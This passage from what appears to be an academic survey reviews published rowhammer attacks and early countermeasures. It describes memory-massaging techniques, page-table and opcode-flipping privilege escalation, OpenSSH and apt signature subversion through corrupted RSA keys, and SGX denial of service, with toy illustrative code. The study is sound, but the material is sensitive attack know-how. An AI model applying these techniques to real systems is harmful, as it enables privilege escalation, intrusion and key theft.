The Still Hammerable attack [63] proposes a new technique called Memory Ambush to locate hammerable buffers next to the target object without exhausting memory, by leveraging the inherent design of the Linux kernel mmap and the buddy physical page allocator. The attack uses double-owned video buffers, shared between kernel and user process and allocated from the kernel partition, thereby bypassing the memory isolation of the CATT defence (5.3). First of all, they identify the hammerable buffers that could be useful for the exploit. A useful buffer should be allocated from the kernel partition but accessible by an unprivileged user process. In addition, the buffer must be large enough to increase the exploitation possibilities. The buffers are virtually contiguous but physically discontiguous; they can be mapped to any physical page. In their experiments, they use the double-owned video buffer of Video4Linux [76], a device driver that provides an API for programs to capture real-time video on Linux. The steps to implement the attack are explained below.
 Non-template memory: The CATT countermeasure (5.3) removes the possibility of a user process templating the kernel memory. The attack therefore just sprays Page Tables and hammers the buffer repeatedly until a bit is flipped in a PTE.
 Memory Massaging: The Memory Ambush technique aims to place the video buffers and the page tables next to each other by leveraging Linux features. Firstly, they exhaust all the small blocks by creating multiple Page Tables in Linux. They achieve this by mmap-ing the same file into different parts of the user address space; the buddy allocator allocates a 4KB block for each PT (step B in Figure 32). They monitor when the small blocks are


exhausted by reading the /proc/buddyinfo file. Next, they place the double-owned buffer next to the PTs, since they are expected to share the same target block (step C in Figure 32). The size of the target block should be twice the row size, to guarantee that it occupies two adjacent rows in the DRAM layout (one for the buffer and one for the PT). If the buffer is smaller than a row size, the page tables ought to occupy the remaining empty pages of the split target block. They repeat this step until the desired memory threshold is reached (step D in Figure 32).

Figure 32 Memory Ambush. Figure in [63]

 Trigger RowHammer: They trigger a single-sided rowhammer attack by selecting a pair of virtual addresses that are on different rows of the same bank. The specific address pair has been resolved in previous steps by side-channel row-buffer analysis. Besides, they have to verify the exploitability of the bit flip; if it is not exploitable, they restart the process from the Memory Massaging step.
 System Abusing: They gain root/kernel privileges by using the write/read access to a PT, achieved through the attack, to change the uid of the current process to 0.
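The /proc/buddyinfo monitoring used during the massaging step can be sketched as below. The sample line is made up; the assumption is only the file's general layout: one line per zone, with the per-order free-block counts following the zone name.

```python
def free_counts(buddyinfo_line):
    # "Node 0, zone Normal 12 7 3 ..." -> [12, 7, 3, ...] (one count per order)
    return [int(x) for x in buddyinfo_line.split()[4:]]

def low_orders_exhausted(buddyinfo_line, up_to_order=2):
    # True when no free blocks remain at orders 0..up_to_order
    counts = free_counts(buddyinfo_line)
    return all(c == 0 for c in counts[:up_to_order + 1])

sample = "Node 0, zone   Normal      0     0     0    5    2    1"
assert free_counts(sample) == [0, 0, 0, 5, 2, 1]
assert low_orders_exhausted(sample)        # orders 0-2 are drained
```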

4.3.3 Memory Waylaying
The Another Flip in the Wall attack [43] introduces a novel alternative for memory massaging, called Memory Waylaying, for both Linux and Windows. It exploits the fact that page cache pages, after being evicted from DRAM, are loaded to a new random physical location. They

leverage the prefetch side-channel attack of [64] to detect when data in virtual memory is placed at a specific physical location.
 Memory Template: The attacker launches the attack enclave on a host and templates the DRAM for possible bit flips. This is done via one-location hammering and memory allocation via memory-mapped files, which avoids out-of-memory situations. The result of this phase is a list of vulnerable physical pages in standard system executable binaries or shared libraries.
 Memory Massaging: They use the prefetch-based prediction oracle to know when the targeted vulnerable binary or library page is placed at one of the exploitable memory locations, monitoring the set of target addresses during the Memory Waylaying. The Memory Waylaying technique performs replacement-aware page cache eviction using only page cache pages. The cache pages, after being discarded from DRAM, are loaded to a new random physical location, so through continuous eviction the page is eventually placed at a vulnerable physical location. This technique is very difficult to detect with the existing rowhammer countermeasures because it does not exhaust memory. Nevertheless, it needs a long time to complete: around 90 hours in their implementation test.
 Trigger RowHammer: They predictably flip the bit in the opcode of the target page using one-location hammering. The attacker can also verify where the bit was flipped by reading the content of the binary page. This phase takes just a few seconds to complete.
 System Abusing: Now the binary page in memory contains the modified opcode for sudo that bypasses the authentication checks. This provides the attacker with illegitimately obtained root privileges.

4.4 ATTACK INTERFACE
The typical way to introduce errors at memory locations without access permissions used to be hardware-fault attacks. These fault attacks11 typically require physical access to the device, in order to expose it to specific physical conditions such as low temperature or radiation, or to a laser on a dismantled microchip causing spurious currents inside the target chip [77]. Currently, hardware faults can also be induced by software. Software fault-injection techniques are attractive because they do not require expensive hardware, do not need direct access to the device, and can be used to target applications and the OS, which is difficult to do with hardware fault injection [77]. Rowhammer can be considered one of these software fault-injection techniques

11 Fault Analysis (FA) is a class of implementation attacks on embedded systems. It has attracted great interest in recent years, starting with the analysis of the exploitability of random errors up to more developed attacks that try to induce faults within a cryptographic system. Fault models are often used under a transient-fault assumption: a fault is injected during a target computation while other computations remain unaffected. Most fault analysis techniques are differential, requiring a correct and a faulty computation with the same inputs in order to exploit the difference in output for key recovery. Countermeasures such as a random values padding technique, which prevents repeated encryptions of the same input, and Dual Module Redundancy (DMR), which performs redundant operations followed by comparison to detect faults, can be implemented to be secure against single fault injection.

at runtime. The faults are injected as bit flips to emulate errors resulting from faults. The different kinds of clever exploitation techniques are described in this section and summarized in Table 10.

Attack Interface               Page Table  Escape Sandbox  Shared     Browsers  RDMA     TEE  Flipping
                               Corruption  NaCl            Resources            network       Opcodes
GoogleProject0                 ✓           ✓                                                  ✓
Non-Temporal RH                            ✓
Curious case of RH                                         ✓
Dedup Est Machina                                                     ✓
Flip Feng Shui                                             ✓
One bit flip, one cloud flop                               ✓
DRAMMER                        ✓
SGX-Bomb                                                                                 ✓
Another Flip in the Wall                                                                 ✓    ✓
Glitch                                     ✓
Trowhammer                                                                     ✓
RAMPAGE                        ✓
PFA                                                        ✓
Still Hammerable               ✓

Table 10 Attack Interface

4.4.1 Page Table Corruption Attacks
The attacks in this group aim to flip a bit in a user process Page Table in order to gain write and read access to all system memory.
 One of the GoogleProject0 [71] (4.3.2.1.1) attacks aims to escalate privileges and achieve access to all physical memory. It aims to flip a bit in one of the sprayed Page Table Entries so that it points, with write access, to a Page Table location. The process can then modify a page table and gain access to all physical memory.
 DRAMMER [2] and RAMpage [60] exploit a bit flip in a Page Table Entry in order to gain access to any physical memory location. Instead of spraying Page Tables all over memory, they trick the memory allocator into placing the Page Table at the chosen vulnerable location.
 The Still Hammerable attack [63] also exploits the Page Table corruption technique to gain root/kernel privileges from a user process.

4.4.2 Escape Sandbox Native Client Restrictions
 One of the exploits introduced in GoogleProject0 [71] proposes to induce the bit flips directly in the assembly instructions, with the target of escaping the security restrictions of

70

the sandbox platform for running native code (C/C++) (4.3.2.1.2). They bypass the platform's instruction-level restriction policy. This policy ensures that native code executes only within its own code, accesses only its own data, and communicates with the browser only through predefined interfaces. The target is to use rowhammer to flip bits in the native instructions so as to make a jump to a non-bundle-aligned memory address. The process can then access memory outside its reserved dynamic code area.
 A new approach to escaping the sandbox was presented in Non-Temporal [47]. They use non-temporal instructions instead of clflush and need to massage the memory in a specific way (4.3.2.1.3) to trigger the bit flip in the native code.
 The Glitch attack [58] [78] compromises the JavaScript sandbox of the Firefox browser by achieving read/write permissions on any mapped region of the process virtual address space. This provides the attacker with the ability to execute code remotely by overwriting a method pointer of a JavaScript object.
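NaCl constrains indirect jump targets to instruction-bundle boundaries; a single flipped bit in an encoded target breaks that invariant. A sketch (the addresses and the flipped bit are invented; the 32-byte bundle size is NaCl's on x86):

```python
BUNDLE = 32                          # NaCl instruction-bundle size in bytes

def bundle_aligned(addr):
    return addr % BUNDLE == 0

target = 0x20040                     # a valid, bundle-aligned jump target
assert bundle_aligned(target)

flipped = target ^ (1 << 3)          # rowhammer flips one low bit of the target
assert not bundle_aligned(flipped)   # the jump now lands mid-bundle
```

Landing mid-bundle means the validator's instruction-boundary guarantees no longer hold, which is exactly what lets the exploit execute unvetted instruction sequences.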

4.4.3 Attacks Across Shared Resources
 The One Bit Flip, One Cloud Flop attack [55] is implemented in a kernel module of the Linux OS running on Xen guest VMs, and breaks Xen paravirtualization memory isolation by replacing a Page Table. The attacker replaces one of his own page tables with a forged one and maps 512 of his virtual pages to 512 victim physical pages.
 The Flip Feng Shui attack [42] provides a malicious guest VM, in a practical cloud setting, with the ability to gain unauthorized access to a co-hosted victim VM. It compromises OpenSSH by exploiting the memory deduplication feature.
 The Curious Case of Rowhammer [54] proposes a methodology that uses timing analysis (a Prime+Probe attack; APPENDIX 1: Side Channel Attacks) to find out where the cryptographic keys are stored in memory. They use row-buffer collision time analysis to induce faults in a 1024-bit RSA12 key in cross-VM environments.
 The PFA [61] aims to use rowhammer to induce a persistent fault in the Libgcrypt 1.6.3 cryptographic library shared on a server with shared library settings. The target is to find the master key of AES-128 13 by bypassing the typical countermeasures implemented to avoid fault injection attacks.

4.4.4 JavaScript-Based Remote Attacks from Browsers
 Rowhammer.js [3] presents a remote software-induced hardware-fault attack based on their own rowhammer implementation, which is independent of the instruction set of the CPU. They implemented it in JavaScript, in Firefox 39, because JavaScript is a scripting

12 RSA is a public-key cryptosystem widely used for secure data transmission. It solves the key distribution problem inherent to symmetric encryption, and is also used for generating digital signatures, which can provide authenticity and non-repudiation of messages. RSA relies on the assumption that it is computationally infeasible to derive the private key from the public key. 13 AES is a symmetric block cipher, i.e. a method of encrypting text in which a cryptographic key and algorithm are applied to a block of data at once rather than one bit at a time. It includes three possible block ciphers: AES-128, AES-192, and AES-256.


language that is used in all modern browsers to create interactive elements on websites. There are two main challenges in performing this attack: first, finding an optimal eviction strategy as a replacement for the flush instruction; second, finding address pairs efficiently, because JavaScript has no concept of virtual addresses or pointers (4.2.2.1). They use the double-sided rowhammer from [71] and propose their own adaptive eviction strategies. In their empirical research, they find that the probability of bit flips in JavaScript and in native code is almost the same for different refresh intervals. They presume that any machine vulnerable to the native-code attack could also be vulnerable to the remote JavaScript attack. However, the Ivy Bridge laptop is the only one on which they demonstrate enough bit flips without clflush under default settings. Notice that this is not an end-to-end attack, but just a way to trigger the rowhammer vulnerability remotely. Also, success requires the use of Huge Pages, which is not a feature active by default.
 The Dedup Est Machina [46] team presents an end-to-end JavaScript-based attack against the Microsoft Edge browser, running on Windows 10, in the absence of software bugs and with all defences turned on. They combine their deduplication-based primitives (4.3.2.2.1) with a reliable rowhammer exploit to gain arbitrary memory read and write access in the browser. They find the cache eviction sets and use reduction algorithms similar to [3] in order to find minimal eviction sets. Then, they use single-sided rowhammer to pivot from a reference to a valid target object to a counterfeit object, resulting in arbitrary memory read/write capabilities in Microsoft Edge.

4.4.5 Remote Attacks on Fast RDMA-Enabled Networks
 The Throwhammer [59] attack can trigger and exploit rowhammer bit flips directly from a remote machine by sending network packets. RDMA-enabled networks of at least 10Gbps provide the attacker with the opportunity to access DRAM directly, fast enough to trigger the vulnerability. They propose an end-to-end exploit against an RDMA-Memcached key-value store. The arbitrary write primitive achieved can be used to redirect the control flow and achieve code execution.

4.4.6 Trusted Execution Environments (TEE)
The attacks in this section exploit specific features that enable secure computation. Specifically, they target the Intel Software Guard Extensions (SGX), a commodity hardware-based TEE implementation designed to have a small trusted computing base. The drop-and-lock policy implemented in SGX is based on the assumption that violations of memory integrity can be induced by hardware attacks only. Rowhammer introduces a new threat by undermining the integrity of an enclave, triggering the vulnerability of the memory hardware purely in software. Since the drop-and-lock policy still applies in this case, a software-only rowhammer attack can halt the processor without physical access to the DRAM. DoS attacks (4.5.4) that allow a remote client to lock the server have been proposed in SGX-Bomb [56] and in the Another Flip in the Wall attack [43], because memory modification through disturbance errors is not reflected in the integrity tree.


4.4.7 Flipping Opcodes
The attacks in this category identify potential target bit flips in binary opcodes by manually looking for devastating outcomes, such as obtaining root permission without knowing the root password, and then exploit them via rowhammer.
 One of the GoogleProject0 [45] [71] attacks aims to flip bits in the NaCl sandbox code. They bypass the NaCl protection policies by flipping bits in the native instructions that will allow memory accesses at non-aligned addresses.
 The Another Flip in the Wall attack [43] describes a generic technique for exploiting bit flips in cached copies of binary files, with the aim of mounting a privilege escalation attack in an SGX cloud. Notice that bit flips in opcodes yield valid opcodes in most cases for x86 instructions. For example, they exploit opcode flipping in the sudo binary and the sudoers.so shared library for privilege escalation. In this case, they find 29 different bit-flip offsets in the sudo binary that break the password verification logic. All of them affect the conditional jump at the password verification location in a way that inverts the condition, treating an incorrect password as if it were correct.
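As a concrete illustration of why opcode flips so often yield valid instructions: the x86 short conditional jumps JE (0x74) and JNE (0x75) differ in exactly one bit, so a single flip inverts the branch. This particular pair is an example of the phenomenon, not necessarily the exact offset exploited in [43].

```python
JE, JNE = 0x74, 0x75                 # x86 short-jump opcodes: je / jne
flipped = JE ^ 0x01                  # flip the least-significant opcode bit
assert flipped == JNE                # "jump if equal" becomes "jump if not equal"
assert bin(JE ^ JNE).count("1") == 1 # the two opcodes differ in a single bit
```

Flipping that bit in a password check inverts the comparison outcome without making the binary crash, which is exactly the behaviour described above.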

4.5 ATTACK TARGET
In this section, we categorize the different targets that rowhammer attacks have aimed at until now. The specific targets affect the design of the attack methodologies, since different kinds of targets require different techniques to exploit the corrupted bit (Table 11).

Attack Target                  Confidentiality  Integrity  DoS  System Privilege  Remote System
                               Attacks          Attacks         Escalation        Privilege Escalation
GoogleProject0                                                  ✓
Non-Temporal RH
Curious case of RH             ✓
Dedup Est Machina                                                                 ✓
Flip Feng Shui                 ✓                ✓
One bit flip, one cloud flop   ✓                ✓
DRAMMER                                                         ✓
SGX-Bomb                                                   ✓
Another Flip in the Wall                                   ✓    ✓
Glitch                                                                            ✓
Trowhammer                                                                        ✓
RAMPAGE                                                         ✓
PFA                            ✓
Still Hammerable                                                ✓

Table 11 Attack Target


4.5.1 System Privilege Escalation
System security is based on the differentiation between processes that run with system permissions and unprivileged user-mode processes. A user process is not able to access sensitive data without permission. System privilege escalation attacks are local rowhammer attacks that aim to break this security mechanism by corrupting privileged memory locations from an unprivileged process. They exploit the memory corruption to achieve write and read primitives over the whole system. All the attacks in this category rely on running a malicious process with user privileges locally on the system.
 GoogleProject0 [71] presents a Page Table Entry based exploit that uses a rowhammer-induced bit flip to achieve write/read access outside the physical memory of the process. They use the Page Table Data Spraying (4.3.2.1.1) technique to modify a page table and get access to any physical memory page. Breaking the memory process isolation provides a Linux process with the ability to escalate privileges and gain access to all physical memory. From then on there are many ways to exploit it; some of their proposals are:
o Make shellcode run as root by modifying a SUID-root executable in such a way that the /bin/ping file points to the attacker's own shellcode. This approach is fast and portable but requires access to the pagemap file.
o A related option modifies a library that a SUID executable uses, such as /lib64/ld-linux-x86-64.so.2.
o A less portable approach modifies kernel code, such as the kernel's syscall handling code, or kernel data structures such as the process's UID field.
 The DRAMMER [2] and RAMpage [60] papers present a system privilege escalation attack for the Android OS. They aim to flip a bit in one of their own Page Table Entries in a way that makes it point to another page table, or to the Page Table itself. This provides the attacker with write permissions on the specific Page Table.
The attacker achieves control over one of their own page tables, enabling root privilege escalation. To complete the Android root exploitation, they use the controlled page table to probe kernel memory looking for their own struct cred. The struct cred structure represents the security context of the process, specifying the process credentials and holding the user and group IDs (6 different ones). Android provides each app with a unique ID; in order to fingerprint the security context, it is necessary to compare 24 (6 × 4) bytes using memcmp(), which takes around 600ns. In their experiments, they find that the physical page that stores the specific struct cred is always aligned to a 128-byte boundary and placed between 0x30000000 and 0x38000000. Then 32 (4096/128) possible locations within a page and 2^20 different physical pages must be checked in the worst case, which means 2^20 × 32 = 33,554,432 calls to memcmp(). The attacker controls just a single page table with 512 Page Table Entries; for ARMv7, it is necessary to flush the TLB every 512 entries. In their empirical studies, they successfully exploit the Nexus 5 in less than 20 seconds. However, their worst-case scenario could take a little over 15 minutes, owing to the most time-consuming phase, the templating.


 The Another Flip in the Wall [43] study presents a full attack for a local scenario where the attacker runs the attack on a personal computer and performs a privilege escalation attack abusing an unprivileged SGX enclave. It relies on the opcode flipping technique (4.4.7) and the memory waylaying process (4.3.3). They performed their attack successfully on an Intel Skylake i7-6700K with DDR4-2133, an i5-5230M with DDR3-1600 memory, and an i7-4790 with Kingston DDR3-1600.
 The Still Hammerable attack [63] uses the write primitives achieved by corrupting a user process's Page Table to modify the UID field of the process to 0.

4.5.2 Remote System Privilege Escalation
All the attacks in this category are triggered remotely and rely on a previous step of luring the victim to a website that hosts the malicious JavaScript application, by using phishing emails or just by sending network packets to the target system. Note that remote attacks are more constrained and harder to fulfil than local ones, but they are much stealthier and their application could be much more widespread.
 The Dedup Est Machina [46] team presents an end-to-end JavaScript-based attack against the Microsoft Edge browser, running on Windows 10, in the absence of software bugs and with all defenses turned on. They gain arbitrary memory read/write access to the heap and, by using an incremental disclosure strategy, to the entirety of Microsoft Edge's address space.
 The Glitch attack [58] [78] compromises the JavaScript sandbox of the Firefox browser by achieving read/write permission, allowing the attacker to achieve privilege escalation remotely. They trigger the end-to-end compromise in between a minimum of 47 seconds and a maximum of 586 seconds.
 The Throwhammer [59] attack gains code execution on a remote key-value server application by achieving a write primitive outside the DRAM buffer area. The write primitive allows them to corrupt the GOT (Global Offset Table), redirecting the control flow and achieving code execution.

4.5.3 Confidentiality Attacks
 The attack One Bit Flip, One Cloud Flop [55] breaks the confidentiality of a victim that runs an Apache web server on which HTTPS was configured to support SSL/TLS. The attacker conducts the cross-VM rowhammer attack and scans the victim memory looking for the beginning of an RSA struct. The RSA_check_key() function provided by OpenSSL takes a pointer as an argument and checks for an RSA struct by validating the following conditions: p and q are both prime numbers, n = p * q, and (x^e)^d ≡ x mod n. If the function validates the location, then it is the beginning of an RSA structure and the private key can be extracted. They prove it on a machine equipped with a Broadwell i5-5300U processor and 8GB of DRAM, but it should also work on the other machines where they found exploitable bits, such as a Sandy Bridge i3-2120 (4GB) and a Sandy Bridge i5-2500 (8GB).
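The validation logic described above can be illustrated with a toy C sketch that uses small integers in place of OpenSSL bignums. All key values below are textbook RSA examples, not values from the attack, and the function is a hypothetical stand-in for RSA_check_key().

```c
#include <assert.h>
#include <stdint.h>

/* Trial-division primality test, adequate for small toy integers. */
static int is_prime(uint64_t v)
{
    if (v < 2) return 0;
    for (uint64_t i = 2; i * i <= v; i++)
        if (v % i == 0) return 0;
    return 1;
}

/* Square-and-multiply modular exponentiation. */
static uint64_t pow_mod(uint64_t b, uint64_t e, uint64_t m)
{
    uint64_t r = 1;
    b %= m;
    while (e) {
        if (e & 1) r = (r * b) % m;
        b = (b * b) % m;
        e >>= 1;
    }
    return r;
}

/* A candidate location looks like an RSA key only if p and q are
 * prime, n = p*q, and (x^e)^d = x (mod n) for a probe value x. */
int looks_like_rsa_key(uint64_t p, uint64_t q, uint64_t n,
                       uint64_t e, uint64_t d, uint64_t x)
{
    if (!is_prime(p) || !is_prime(q) || n != p * q) return 0;
    return pow_mod(pow_mod(x, e, n), d, n) == x % n;
}
```

The real scan calls the check at every candidate address of the victim's memory; the check fails fast on almost all of them, so only a true RSA structure survives all three conditions.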


 The Flip Feng Shui attack surface [42] proves its strategy by bypassing the RSA authentication mechanism of the OpenSSH daemon. First, the attacker forces OpenSSH to read the authorized_keys file and copy it into the page cache by initiating an SSH connection to the victim with an arbitrary private key. Now, with the victim's public key in the cache, the bit flip is triggered on the modulus n in such a way that the resulting key (n', e) can be factorized with high probability. They flip bits according to the template to obtain corrupted keys (n', e). Each n' candidate is factorized using the ECM algorithm14. For all successful factorizations, the exponent d' corresponding to (n', e) is calculated. The private key matching the corrupted public key, (n', d'), is generated using the PyCrypto RSA cryptographic library [79] and can be used to log in to the victim VM using an unmodified OpenSSH client. The bit flip will likely produce an n' that is not the product of two primes of almost equal size, which is easier to factorize than n.
 The Curious Case of Rowhammer [54] paper induces a bit flip in the secret exponent by running code that hammers random rows in the specific bank where the secret is kept until the decryption output changes. The bit flip introduced in the secret exponent can reveal the secret by applying faulty-signature techniques. A single faulty signature is enough to retrieve the secret.
 The PFA [61] attack recovers the secret key of an AES-128 implementation using the Permanent Fault Analysis technique. The persistent fault is injected through rowhammer into the T-Table, the look-up table used in the substitution stage of AES-128, which is stored in memory. The PFA technique to extract the AES-128 master key has been proved against Libgcrypt 1.6.3, an open-source cryptographic library that provides numerous cryptographic building blocks.
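The key-recovery step of the Flip Feng Shui attack above can be sketched with small numbers. This is a hypothetical illustration: trial division stands in for ECM, and all parameters are toy values far below real RSA sizes.

```c
#include <assert.h>
#include <stdint.h>

/* Extended Euclid: returns gcd(a, b) and Bezout coefficients x, y. */
static int64_t egcd(int64_t a, int64_t b, int64_t *x, int64_t *y)
{
    if (b == 0) { *x = 1; *y = 0; return a; }
    int64_t x1, y1, g = egcd(b, a % b, &x1, &y1);
    *x = y1;
    *y = x1 - (a / b) * y1;
    return g;
}

/* Modular inverse of e mod phi (the d' computation), or 0 if none. */
int64_t mod_inv(int64_t e, int64_t phi)
{
    int64_t x, y;
    if (egcd(e, phi, &x, &y) != 1) return 0;
    return ((x % phi) + phi) % phi;
}

/* Smallest prime factor of n by trial division; a corrupted modulus
 * n' tends to have small factors, which is what makes it easy. */
uint64_t small_factor(uint64_t n)
{
    for (uint64_t i = 2; i * i <= n; i++)
        if (n % i == 0) return i;
    return n;
}
```

For example, flipping the low bit of the toy modulus 3233 = 61 * 53 yields 3232 = 2^5 * 101, which trial division splits instantly; once the factorization of n' is known, d' is recomputed as the inverse of e modulo phi(n').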
 The attack One Bit Flip, One Cloud Flop [55] also exploits rowhammer to log in to an OpenSSH server without a password. The adversary searches the binary code of sshd for a code snippet in the sshpam_auth_passwd() function. The attacker can inject a bit flip at the target memory location to change the code as shown in Figure 33. The modified code replaces the call to pam_authentication(), which returns 0 in register %eax on successful authentication, with code that assigns 0 to %eax directly, so the authentication is bypassed.

14 The Elliptic Curve factorization Method (ECM) can quickly find factors of up to 60 or 128 bits. It is a generalization of Pollard's p−1 method, which efficiently finds any prime factor p of a composite integer n for which p−1 is smooth, working in a multiplicative group; in ECM that group is replaced by the group of points on a random elliptic curve [113]. The running time of ECM depends on the size of the prime factors of n, so the algorithm tends to find small factors first. In the hardest case, when n is a product of two primes of roughly the same size, ECM is not as efficient as the Quadratic Sieve, which selects and tests polynomials for the factorization.
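As a toy illustration of the Pollard p−1 idea underlying ECM (small integers only; a real implementation operates on moduli hundreds of bits long):

```c
#include <assert.h>
#include <stdint.h>

static uint64_t gcd_u64(uint64_t a, uint64_t b)
{
    while (b) { uint64_t t = a % b; a = b; b = t; }
    return a;
}

static uint64_t pow_mod_u64(uint64_t b, uint64_t e, uint64_t m)
{
    uint64_t r = 1;
    b %= m;
    while (e) {
        if (e & 1) r = (r * b) % m;
        b = (b * b) % m;
        e >>= 1;
    }
    return r;
}

/* Pollard's p-1: compute a = 2^(bound!) mod n; if some prime factor p
 * of n has a smooth p-1, then p-1 divides bound! and gcd(a-1, n)
 * reveals p. Returns a non-trivial factor of n, or 0 on failure. */
uint64_t pollard_p1(uint64_t n, uint64_t bound)
{
    uint64_t a = 2;
    for (uint64_t j = 2; j <= bound; j++)
        a = pow_mod_u64(a, j, n);       /* a = 2^(bound!) mod n */
    uint64_t g = gcd_u64(a > 0 ? a - 1 : 0, n);
    return (g > 1 && g < n) ? g : 0;
}
```

For n = 299 = 13 * 23 and bound 4, the factor 13 is found because 13 − 1 = 12 divides 4! = 24, while 23 − 1 = 22 does not.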


Figure 33 Pseudo-code illustrating the attack against the OpenSSH server. On the left is the original code and on the right the code after the bit flip

 A second attack based on Flip Feng Shui [42] is presented. It subverts GNU Privacy Guard, a security application that verifies software distributions by checking signatures with trusted public keys. In particular, the apt package distribution system of Ubuntu is targeted. First, it steers the victim to a malicious repository by inducing a bit flip in sources.list, which holds the URLs of the repositories used for package installation and updates. Then, similarly to the OpenSSH attack, they apply bit-flip mutation to create a corrupted RSA key modulus that can be factorized. The private key can be exported using the PyCrypto RSA cryptographic library [79] and converted to GPG format using pem2openpgp [80]. The malicious package can be signed with the new private key, and the victim will download and install it without warning.

4.5.4 DoS Attacks
A DoS (Denial-of-Service) attack is a cyber-attack in which the attacker makes a machine or network resource unavailable to its intended users. This kind of attack is typically accomplished by flooding the targeted resource with superfluous legitimate requests to overload the system. Much cleverer and more difficult to detect is a DoS attack that exploits specific features of the resource to make it block itself. Rowhammer introduces the possibility of locking the processor, launching a DoS attack that intentionally triggers the defence mechanism of the MEE (Memory Encryption Engine) of SGX against physical attacks on memory integrity. One of the attacks presented in Another Flip in the Wall [43], as well as SGX-Bomb [56], aims to abuse Intel SGX in a cloud scenario to trigger a denial-of-service attack that will take the server down. The attacker launches the attack enclaves on many hosts and tries to trigger vulnerable bit flips in the EPC (Enclave Page Cache) memory region used by SGX. CPUs with SGX enabled will shut down every machine with corrupted memory in the EPC region to guarantee confidentiality until it is manually rebooted, which could leave the cloud unable to provide its service.


5 RH COUNTERMEASURES

The aforementioned attacks demonstrate the severity of the rowhammer vulnerability and have pushed researchers to propose countermeasures that can defend systems against it. The common belief is that the rowhammer vulnerability cannot be totally fixed by means of software updates; it requires the production and deployment of redesigned DRAM modules that take the HW-based solutions into account. Hence, since existing legacy systems will remain vulnerable for many years, many different SW-based mitigations have been proposed to increase the difficulty of conducting the attack.

5.1 DISABLE UNDER ATTACK FUNCTIONALITIES
The simplest countermeasure that can be applied is to remove or disable, if possible, the mechanisms rowhammer depends on, preventing the exploitability and even the triggering of the vulnerability.

 Instruction blacklisting
Disallowing or rewriting instructions such as CLFLUSH and non-temporal instructions has been proposed as a countermeasure and is now deployed in Google Native Client. This countermeasure disables the GoogleProject0 [45] and Non-Temporal [47] attacks respectively on NaCl.

 Prohibited pagemap access from userland
Access to the Linux pagemap interface has been prohibited from userland as one of the first countermeasures against rowhammer attacks that learn which rows lie in the same bank through access to this kernel file. Since Linux 4.0, released in early 2015, this information can be accessed only by privileged users in order to hide it from possible rowhammer exploitation [67] [68]. This countermeasure prevents attacking Linux from version 4.0 onwards through the GoogleProject0 [45], Non-Temporal [47], Curious Case of RH [54], and PFA [61] attacks.
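The pagemap entry format that this countermeasure hides is documented by the kernel: each 64-bit entry stores the physical frame number in bits 0-54 and a "page present" flag in bit 63, and since Linux 4.0 the PFN field simply reads as zero for unprivileged callers. A small C sketch of the decoding (the entry values used in the test are synthetic):

```c
#include <assert.h>
#include <stdint.h>

/* Decode a 64-bit /proc/<pid>/pagemap entry per the kernel's
 * pagemap documentation: bits 0-54 = PFN, bit 63 = page present. */

uint64_t pagemap_pfn(uint64_t entry)
{
    return entry & ((1ULL << 55) - 1);   /* keep bits 0-54 */
}

int pagemap_present(uint64_t entry)
{
    return (int)((entry >> 63) & 1);
}
```

An attacker with pagemap access multiplies the PFN by the page size to obtain the physical address of any of its virtual pages, which is exactly the capability the Linux 4.0 restriction removes.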

 Disable Memory Deduplication and MMU Paravirtualization
Attacks such as Dedup Est Machina [46], Flip Feng Shui [42] and One Bit Flip, One Cloud Flop [55] utilize special mechanisms, like memory deduplication or MMU paravirtualization, to induce the OS to replace the victim object with a forged object that is crafted by the attacker and has the same content as the victim's. These techniques are not universally applicable; they only work on systems that have the specific mechanism enabled. Thus, a successful way to prevent them is simply to remove or disable the mechanisms they depend on.

 Disable Contiguous heap
Google's first reaction to the DRAMMER [2] attack disabled the kmalloc heap from user space, removing an attacker's primitive for allocating contiguous memory. They first introduced the countermeasure in their Android security update of November 2016, preventing DRAMMER [2] from attacking the latest Android builds. The RAMpage [60] attack was

proposed to bypass this specific countermeasure; it modifies the DRAMMER attack so that it can be triggered using the regular system heap, which does not guarantee the allocation of contiguous memory.

 Pool Size Reduction
Google, in their second round of countermeasures for DRAMMER mitigation, reduced the sizes of the memory pools that can be accessed by the user. By reducing the maximum pool size to 64KB, the attacker is more likely to obtain fragmented memory pieces that are not physically contiguous.

5.2 HARDWARE-BASED SOLUTIONS
The most effective defence is to replace the vulnerable DRAM module with new memory chips that do not suffer from the rowhammer vulnerability. Besides that, various aspects that could be improved at the hardware-settings level have been discussed in [1], with the aim of eliminating the possibility of triggering the vulnerability on a vulnerable DRAM. Some of the techniques, such as ECC and TRR, require the production of new memory chips, while others require only changes in the Memory Controller.

 Double DRAM Refresh Rate
The rowhammer technique requires accessing adjacent rows enough times within the refresh interval (3.1); one proposal is to double the DRAM refresh rate so that the hammering frequency is no longer sufficient to induce bit flips. The DDR standard specifies that rows should be refreshed at least every 64ms, so the countermeasure proposes to refresh each row at least every 32ms. This has been applied by most hardware vendors via EFI or BIOS updates [81] [82] [83]. Apart from incurring a high performance penalty, this defence has also been shown to be ineffective against attacks such as ANVIL [49] and Good go Bad [53].

 Error-Correction Code (ECC) Memory
ECC RAM can detect and correct 1-bit errors and therefore deals with rowhammer only in the case of a single bit flip. Nowadays Intel deploys ECC RAM mainly for servers; it is normally not supported on desktops and laptops. Only AMD Ryzen processors support ECC RAM in commodity systems. Furthermore, IBM's Chipkill error correction can successfully recover from 3-bit errors, but uncorrectable multi-bit flips can still be exploitable and result in DoS attacks such as the one shown in Another Flip in the Wall [43].

 Target Row Refresh (TRR)
TRR refreshes adjacent rows if the targeted row is accessed at a high frequency. It relies on the Maximum Activation Count (MAC) mechanism, which keeps track of the number of activations of each row. When the number of activations for one row reaches the row hammering threshold, the victim rows adjacent to the accessed one get refreshed. A specific mechanism has been proposed in [35]. The new LPDDR4 standard includes the adoption of TRR and MAC as optional protection mechanisms, leaving the chip still vulnerable to rowhammer by default.
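The MAC bookkeeping behind TRR can be sketched as a per-row activation counter. NROWS and MAC_THRESHOLD are illustrative values for the sketch, not DDR4/LPDDR4 constants.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Minimal sketch of the Maximum Activation Count idea: count
 * activations per row and report when a row crosses the hammering
 * threshold so its neighbours can be refreshed. */
#define NROWS 8
#define MAC_THRESHOLD 5

static uint32_t act_count[NROWS];

/* Record an activation of `row`; return 1 when the neighbours of the
 * row should be refreshed (the counter is reset at that point). */
int activate_row(int row)
{
    if (++act_count[row] >= MAC_THRESHOLD) {
        act_count[row] = 0;   /* rows row-1 and row+1 get refreshed here */
        return 1;
    }
    return 0;
}

void reset_counters(void) { memset(act_count, 0, sizeof act_count); }
```

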